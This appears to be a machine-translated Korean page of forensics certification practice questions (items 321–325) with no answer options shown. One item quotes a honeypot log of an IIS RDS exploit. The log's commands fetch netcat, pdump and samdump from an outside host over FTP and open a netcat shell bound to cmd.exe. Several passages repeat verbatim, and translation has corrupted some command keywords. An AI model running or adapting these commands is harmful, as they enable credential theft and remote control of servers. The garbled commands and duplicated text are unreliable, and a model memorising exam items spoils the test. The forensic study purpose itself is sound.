312-49v9 문제 321
다음 명령은 무엇을 수행합니까?
dd if=/dev/xxx of=mbr.backup bs=512 count=1
dd if=/dev/xxx of=mbr.backup bs=512 count=1
312-49v9 문제 322
Linux OS에서 보조 IDE 컨트롤러에 연결된 슬레이브 장치는 무엇을 참조합니까?
312-49v9 문제 323
다음은 lab.wiretrip.net에서 호스팅된 허니팟 로그에서 발췌한 것입니다. Snort는 213.116.251.162에서 유니코드 공격을 보고했습니다. File Permission Canonicalization 취약점(UNICODE 공격)은 일반적으로 스크립트를 실행할 수 있는 권한이 없는 임의의 폴더에서 스크립트를 실행할 수 있도록 합니다. 공격자는 유니코드 공격을 시도하고 결국 boot.ini 표시에 성공합니다.
그런 다음 msadcs.dll을 통해 RDS를 사용하는 것으로 전환합니다. RDS 취약점으로 인해 악의적인 사용자는 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행할 SQL 문을 구성할 수 있습니다. 그는 빠른 쿼리를 수행하여 디렉터리가 존재하는지 발견하고 msadcs.dll에 대한 쿼리는 디렉터리가 올바르게 작동하고 있음을 보여줍니다. 공격자는 아래와 같이 명령이 실행되는 RDS 쿼리를 만듭니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c 에코 johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c 에코 종료 >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
주어진 익스플로잇에서 무엇을 추론할 수 있습니까?
그런 다음 msadcs.dll을 통해 RDS를 사용하는 것으로 전환합니다. RDS 취약점으로 인해 악의적인 사용자는 IIS 서버에서 셸 명령(예: CMD.EXE)을 실행할 SQL 문을 구성할 수 있습니다. 그는 빠른 쿼리를 수행하여 디렉터리가 존재하는지 발견하고 msadcs.dll에 대한 쿼리는 디렉터리가 올바르게 작동하고 있음을 보여줍니다. 공격자는 아래와 같이 명령이 실행되는 RDS 쿼리를 만듭니다.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c 에코 johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c 에코 종료 >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
주어진 익스플로잇에서 무엇을 추론할 수 있습니까?
312-49v9 문제 324
법의학 수사관인 Adam은 대규모 조직의 Microsoft Exchange Server에 대한 공격을 조사하고 있습니다.
조사의 첫 단계로 PRIV.EDB 파일을 조사한 결과 메일의 출처와 실행 시 사라진 파일명을 찾았다. 이제 그는 MIME 스트림 콘텐츠를 검사하려고 합니다. 다음 중 그가 조사할 파일은 무엇입니까?
조사의 첫 단계로 PRIV.EDB 파일을 조사한 결과 메일의 출처와 실행 시 사라진 파일명을 찾았다. 이제 그는 MIME 스트림 콘텐츠를 검사하려고 합니다. 다음 중 그가 조사할 파일은 무엇입니까?
312-49v9 문제 325
Annie는 Windows XP OS를 실행하는 시스템에서 삭제된 특정 파일을 검색하고 있습니다. 시스템에서 완전히 삭제되지 않은 파일은 어디에서 찾을 수 있습니까?